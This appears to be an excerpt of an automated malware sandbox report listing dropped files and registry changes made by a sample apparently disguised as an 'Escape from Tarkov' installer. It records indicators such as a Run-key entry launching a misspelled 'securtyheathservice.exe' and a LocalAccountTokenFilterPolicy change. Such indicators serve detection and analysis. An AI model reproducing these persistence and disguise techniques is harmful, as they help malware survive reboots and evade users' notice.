c:\users\user\appdata\local\temp\is-naodm.tmp\idp.dll	Generic Write,Read Attributes
c:\users\user\appdata\local\temp\is-naodm.tmp\isdone.dll	Generic Write,Read Attributes
c:\users\user\appdata\local\temp\is-o4uv9.tmp\_isetup\_setup64.tmp	Generic Read,Write Data,Write Attributes,Write extended,Append data
c:\users\user\appdata\local\temp\ixp000.tmp\3e45v.exe	Generic Write,Read Attributes
c:\users\user\appdata\local\temp\ixp000.tmp\3e45v.exe	Synchronize,Write Attributes
c:\users\user\appdata\local\temp\ixp000.tmp\b3o34.exe	Generic Write,Read Attributes
c:\users\user\appdata\local\temp\ixp000.tmp\b3o34.exe	Synchronize,Write Attributes
c:\users\user\appdata\local\temp\ixp000.tmp\tmp4351$.tmp	Generic Write,Read Attributes,Delete
c:\users\user\appdata\local\temp\ixp001.tmp\1g10a9.exe	Generic Write,Read Attributes
c:\users\user\appdata\local\temp\ixp001.tmp\1g10a9.exe	Synchronize,Write Attributes
c:\users\user\appdata\local\temp\ixp001.tmp\2z0907.exe	Generic Write,Read Attributes
c:\users\user\appdata\local\temp\ixp001.tmp\2z0907.exe	Synchronize,Write Attributes
c:\users\user\appdata\local\temp\ixp001.tmp\tmp4351$.tmp	Generic Write,Read Attributes,Delete
c:\users\user\appdata\local\temp\~lvecdkp.tmp	Generic Read,Write Data,Write Attributes,Write extended,Append data
c:\users\user\appdata\local\temp\~lvecdkp.tmp	Generic Write,Read Attributes
c:\users\user\appdata\roaming\__tmp_rar_sfx_access_check_684890	Generic Read,Write Data,Write Attributes,Write extended,Append data
c:\users\user\appdata\roaming\adobe\flash player\nativecache	Synchronize,Write Attributes
c:\users\user\appdata\roaming\definitions	Generic Write,Read Attributes
c:\users\user\appdata\roaming\definitions	Synchronize,Write Attributes
c:\users\user\appdata\roaming\definitions\amigo.exe	Generic Write,Read Attributes
c:\users\user\appdata\roaming\definitions\amigo.exe	Synchronize,Write Attributes
c:\users\user\appdata\roaming\definitions\atom.exe	Generic Write,Read Attributes
c:\users\user\appdata\roaming\definitions\atom.exe	Synchronize,Write Attributes
c:\users\user\appdata\roaming\definitions\eic.exe	Generic Write,Read Attributes
c:\users\user\appdata\roaming\definitions\eic.exe	Synchronize,Write Attributes

147 additional files are not displayed above.

Registry Modifications

Key::Value	Dados	API Name
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\cmd.exe	之Ǜ	RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\cmd.exe	䀬شǛ	RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\cmd.exe	昏ἚǛ	RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\cmd.exe	ሡᒢǛ	RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\cmd.exe	噮ꃧǛ	RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\cmd.exe	傄媝Ǜ	RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\cmd.exe	蒒怒Ǜ	RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\cmd.exe	䖛莐Ǜ	RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\cmd.exe	菍Ǜ	RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\cmd.exe	滀Ǜ	RegNtPreCreateKey

HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\cmd.exe	橖Ǜ	RegNtPreCreateKey
HKLM\software\wow6432node\microsoft\windows\currentversion\runonce::wextract_cleanup0	rundll32.exe C:\WINDOWS\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\Gkyzesen\AppData\Local\Temp\IXP000.TMP\"	RegNtPreCreateKey
HKLM\software\wow6432node\microsoft\windows\currentversion\runonce::wextract_cleanup1	rundll32.exe C:\WINDOWS\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\Gkyzesen\AppData\Local\Temp\IXP001.TMP\"	RegNtPreCreateKey
HKCU\software\microsoft\windows\currentversion\internet settings\zonemap::proxybypass		RegNtPreCreateKey
HKCU\software\microsoft\windows\currentversion\internet settings\zonemap::intranetname		RegNtPreCreateKey
HKCU\software\microsoft\windows\currentversion\internet settings\zonemap::uncasintranet		RegNtPreCreateKey
HKCU\software\microsoft\windows\currentversion\internet settings\zonemap::autodetect		RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\cmd.exe	帪⅍ﳖǛ	RegNtPreCreateKey
HKLM\software\microsoft\windows nt\currentversion\notifications\data::418a073aa3bc3475		RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\cmd.exe	ᬖ杯؋ǜ	RegNtPreCreateKey
HKLM\system\controlset001\services\stornvme\parameters::stornvmeallowzerolatency		RegNtPreCreateKey
HKLM\system\controlset001\services\stornvme\parameters::queuedepth	@	RegNtPreCreateKey
HKLM\system\controlset001\services\stornvme\parameters::nvmemaxreadsplit		RegNtPreCreateKey
HKLM\system\controlset001\services\stornvme\parameters::nvmemaxwritesplit		RegNtPreCreateKey
HKLM\system\controlset001\services\stornvme\parameters::forceflush		RegNtPreCreateKey
HKLM\system\controlset001\services\stornvme\parameters::immediatedata		RegNtPreCreateKey
HKLM\system\controlset001\services\stornvme\parameters::maxsegmentspercommand	Ā	RegNtPreCreateKey
HKLM\system\controlset001\services\stornvme\parameters::maxoutstandingcmds	Ā	RegNtPreCreateKey
HKLM\system\controlset001\services\stornvme\parameters::forceeagerwrites		RegNtPreCreateKey
HKLM\system\controlset001\services\stornvme\parameters::maxqueuedcommands	Ā	RegNtPreCreateKey
HKLM\system\controlset001\services\stornvme\parameters::maxoutstandingiorequests	Ā	RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\cmd.exe		RegNtPreCreateKey
HKLM\software\microsoft\windows\currentversion\policies\system::localaccounttokenfilterpolicy		RegNtPreCreateKey
HKLM\software\microsoft\windows nt\currentversion\notifications\data::418a073aa3bc3475		RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\cmd.exe		RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\cmd.exe	瑃顃ݱǜ	RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\cmd.exe		RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\cmd.exe	ᮢ⠾ࠩǜ	RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\cmd.exe	뜐餂੺ǜ	RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\cmd.exe	浌ଦǜ	RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\cmd.exe	Ａୣǜ	RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\cmd.exe	觸㻂ᛵǜ	RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\conhost.exe	瑍㻎ᛵǜ	RegNtPreCreateKey
HKCU\software\microsoft\windows\currentversion\run::sejkksuhf9398soidfh8	c:\4C18.tmp\securtyheathservice.exe	RegNtPreCreateKey
HKLM\software\microsoft\windows nt\currentversion\notifications\data::418a073aa3bc3475		RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\cmd.exe	謏ᗌᡤǜ	RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\cmd.exe	턞蜧ᣴǜ	RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\cmd.exe	I个☥ǜ	RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\cmd.exe	㾵띇♆ǜ	RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\cmd.exe	㦍楔♓ǜ	RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\explorer.exe	鲫榜♓ǜ	RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\cmd.exe	韽鰨⛋ǜ	RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\cmd.exe	ꔽ恟⛕ǜ	RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\cmd.exe	䫴Ɤ⛵ǜ	RegNtPreCreateKey
HKLM\software\microsoft\windows nt\currentversion\notifications\data::418a073aa3bc3475		RegNtPreCreateKey
HKCU\software\microsoft\windows\currentversion\explorer\userassist\{cebff5cd-ace2-4f4f-9178-9926f41749ea}\count::zvpebfbsg.jvaqbjf.rkcybere	'Ł噺Ä뾀뾀뾀뾀뾀뾀뾀뾀뾀뾀鈠ꢌ⛵ǜ	RegNtPreCreateKey
HKCU\software\microsoft\windows\currentversion\explorer\userassist\{cebff5cd-ace2-4f4f-9178-9926f41749ea}\count::hrzr_pgyfrffvba	Ǫۏ欗੄Microsoft.XboxGamingOverlay_8wekyb3d8bbwe!App	RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\cmd.exe	ɡ찹⥅ǜ	RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\cmd.exe	ส鍊⧳ǜ	RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\cmd.exe	賫闷⧳ǜ	RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\cmd.exe	⺟ݾ⭡ǜ	RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\cmd.exe	쳳㊙ǜ	RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\cmd.exe	粴촰㊙ǜ	RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\cmd.exe	鐆춂㊙ǜ	RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\cmd.exe	큮춰㊙ǜ	RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\cmd.exe	℃칅㊙ǜ	RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\cmd.exe	칫㊙ǜ	RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\cmd.exe	஬캒㊙ǜ	RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\cmd.exe	띆켌㊙ǜ	RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\cmd.exe	퍛㏚ǜ	RegNtPreCreateKey
HKLM\software\microsoft\windows nt\currentversion\notifications\data::418a073aa3bc3475		RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\cmd.exe	뗅像㝀ǜ	RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\cmd.exe	⇖僶㝀ǜ	RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\cmd.exe	됐瀘䍢ǜ	RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\cmd.exe	繍喺䑵ǜ	RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\conhost.exe	ꔗ嗁䑵ǜ	RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\cmd.exe	迒礇䓎ǜ	RegNtPreCreateKey
HKCU\software\microsoft\windows\currentversion\explorer::slowcontextmenuentries		RegNtPreCreateKey
HKCU\software\microsoft\windows\currentversion\internet settings\5.0\cache\content::cacheprefix		RegNtPreCreateKey
HKCU\software\microsoft\windows\currentversion\internet settings\5.0\cache\cookies::cacheprefix	Cookie:	RegNtPreCreateKey
HKCU\software\microsoft\windows\currentversion\internet settings\5.0\cache\history::cacheprefix	Visited:	RegNtPreCreateKey
HKCU\software\microsoft\edge\blbeacon::failed_count		RegNtPreCreateKey
HKCU\software\microsoft\edge\blbeacon::state		RegNtPreCreateKey
HKCU\software\microsoft\edge\thirdparty::statuscodes	(NULL)	RegNtPreCreateKey
HKCU\software\microsoft\edge\thirdparty::statuscodes		RegNtPreCreateKey
HKCU\software\microsoft\edge\elfbeacon::version	141.0.3537.92	RegNtPreCreateKey
HKCU\software\microsoft\edge\blbeacon::state		RegNtPreCreateKey
HKLM\software\microsoft\windows nt\currentversion\notifications\data::418a073aa3bc1c75		RegNtPreCreateKey
HKLM\software\microsoft\windows nt\currentversion\notifications\data::418a073aa3bc1c75		RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\cmd.exe	ឹ谨䗠ǜ	RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\cmd.exe	௫烺䜧ǜ	RegNtPreCreateKey
HKLM\software\microsoft\active setup\installed components\{89820200-ecbd-11cf-8b85-00aa005b4383}::isinstalled		RegNtPreCreateKey
HKLM\software\clients\startmenuinternet\iexplore.exe\installinfo::iconsvisible		RegNtPreCreateKey
HKLM\software\microsoft\windows\currentversion\setup\oc manager\subcomponents::ieaccess		RegNtPreCreateKey
HKLM\software\microsoft\internet explorer\capabilities::hidden		RegNtPreCreateKey
HKCU\software\microsoft\internet explorer\main::disablefirstruncustomize		RegNtPreCreateKey
HKCU\software\microsoft\internet explorer\suggested sites::logfilefolder	C:\Users\Ddvrlcbi\AppData\Local\Microsoft\Windows\INetCache\Low	RegNtPreCreateKey
HKCU\software\microsoft\windows\currentversion\explorer\clsid\{871c5380-42a0-1069-a2ea-08002b30309d}\shellfolder::attributes		RegNtPreCreateKey
HKCU\local settings\software\microsoft\windows\currentversion\appcontainer\mappings\s-1-15-2-1430448594-2639229838-973813799-439329657-1197984847-4069167804-1277922394::displayname	windows_ie_ac_001	RegNtPreCreateKey
HKCU\software\microsoft\internet explorer\browseremulation::cvlistttl		RegNtPreCreateKey
HKCU\software\microsoft\active setup\installed components\{89820200-ecbd-11cf-8b85-00aa005b4383}::locale	*	RegNtPreCreateKey
HKCU\software\microsoft\active setup\installed components\{89820200-ecbd-11cf-8b85-00aa005b4383}::version	11,3570,19041,0	RegNtPreCreateKey
HKLM\software\microsoft\windows nt\currentversion\notifications\data::418a073aa3bc1c75		RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\cmd.exe	꣖뇛䟙ǜ	RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\cmd.exe	К哃䫦ǜ	RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\cmd.exe	洬ꤞ䭏ǜ	RegNtPreCreateKey
HKLM\software\wow6432node\microsoft\windows\currentversion\uninstall\escapefromtarkov::installlocation	c:\Users\user\downloads\Install_EFT	RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\cmd.exe	匨稑䱢ǜ	RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\cmd.exe	⽡脘冈ǜ	RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\cmd.exe	滎閦刜ǜ	RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\cmd.exe	显풮厌ǜ	RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\cmd.exe	觮ĕ呗ǜ	RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\cmd.exe	쨊契唗ǜ	RegNtPreCreateKey
HKCU\software\microsoft\windows\currentversion\explorer::slowcontextmenuentries		RegNtPreCreateKey
HKCU\software\microsoft\windows\currentversion\explorer::slowcontextmenuentries		RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\cmd.exe	⸤嚏ǜ	RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\cmd.exe	꙲賅圎ǜ	RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\cmd.exe	湨䵻ǜ	RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\cmd.exe	藠耻姍ǜ	RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\cmd.exe	ؚ낸娊ǜ	RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\cmd.exe	놝娊ǜ	RegNtPreCreateKey
HKLM\software\microsoft\rfc1156agent\currentversion\parameters::trappolltimemillisecs	㪘	RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\cmd.exe	㶂Ꚙ书ǜ	RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\cmd.exe	臛믚俪ǜ	RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\cmd.exe	鎅鉅唔ǜ	RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\conhost.exe	묅鉌唔ǜ	RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\cmd.exe	瀕寙嘏ǜ	RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\cmd.exe	냏㎥捥ǜ	RegNtPreCreateKey
HKLM\software\microsoft\windows nt\currentversion\notifications\data::418a073aa3bc1c75		RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\cmd.exe		RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\cmd.exe	୘敦娅ǜ	RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\cmd.exe	᧪刞杓ǜ	RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\cmd.exe	䘐剛杓ǜ	RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\cmd.exe	ꕮ勌杓ǜ	RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\cmd.exe	傄卛杓ǜ	RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\cmd.exe		RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\cmd.exe	㼞咪杓ǜ	RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\cmd.exe	姰哨杓ǜ	RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\cmd.exe	ᚻ⼍柇ǜ	RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\cmd.exe	叀Ꞿ栗ǜ	RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\cmd.exe	㖲퇵棠ǜ	RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\cmd.exe	⯃❹洉ǜ	RegNtPreCreateKey
HKCU\software\microsoft\windows\shell\associations\urlassociations\https\userchoice::progid	MSEdgeHTM	RegNtPreCreateKey
HKCU\software\microsoft\windows\shell\associations\urlassociations\https\userchoice::hash	JrUbLuG0NXI=	RegNtPreCreateKey
HKCU\software\microsoft\windows\currentversion\explorer::slowcontextmenuentries		RegNtPreCreateKey
HKCU\software\microsoft\windows\currentversion\applicationassociationtoasts::undecided_https		RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\cmd.exe	㈽Æ溯ǜ	RegNtPreCreateKey
HKCU\control panel\desktop::enableperprocesssystemdpi		RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\windowspowershell\v1.0\powershell.exe	옍ĩ溯ǜ	RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\cmd.exe	❻烌ǜ	RegNtPreCreateKey
HKCU\software\microsoft\windows\currentversion\applicationassociationtoasts::vbsfile_.vbs		RegNtPreCreateKey
HKCU\local settings\software\microsoft\windows\shell\muicache::c:\windows\system32\wscript.exe.friendlyappname	Microsoft ® Windows Based Script Host	RegNtPreCreateKey
HKCU\local settings\software\microsoft\windows\shell\muicache::c:\windows\system32\wscript.exe.applicationcompany	Microsoft Corporation	RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\cmd.exe		RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\cmd.exe	綴篣琦ǜ	RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\cmd.exe	ꡪ簠琦ǜ	RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\conhost.exe	ｬ簥琦ǜ	RegNtPreCreateKey
HKCU\software\microsoft\windows\currentversion\gamedvr::appcaptureenabled		RegNtPreCreateKey
HKCU\system\gameconfigstore::gamedvr_enabled		RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\cmd.exe	탏䒸瑳ǜ	RegNtPreCreateKey
HKLM\software\microsoft\tracing\mprapi::enablefiletracing		RegNtPreCreateKey
HKLM\software\microsoft\tracing\mprapi::enableautofiletracing		RegNtPreCreateKey
HKLM\software\microsoft\tracing\mprapi::enableconsoletracing		RegNtPreCreateKey
HKLM\software\microsoft\tracing\mprapi::filetracingmask		RegNtPreCreateKey
HKLM\software\microsoft\tracing\mprapi::consoletracingmask		RegNtPreCreateKey
HKLM\software\microsoft\tracing\mprapi::maxfilesize		RegNtPreCreateKey
HKLM\software\microsoft\tracing\mprapi::filedirectory	%windir%\tracing	RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\cmd.exe	ꆈ뾴畳ǜ	RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\cmd.exe	浯쥪痣ǜ	RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\cmd.exe	볏즧痣ǜ	RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\cmd.exe	箏痱ǜ	RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\cmd.exe	햯篔痱ǜ	RegNtPreCreateKey
HKLM\system\controlset001\services\ucpd::edgepartnercode	UCPD	RegNtPreCreateKey
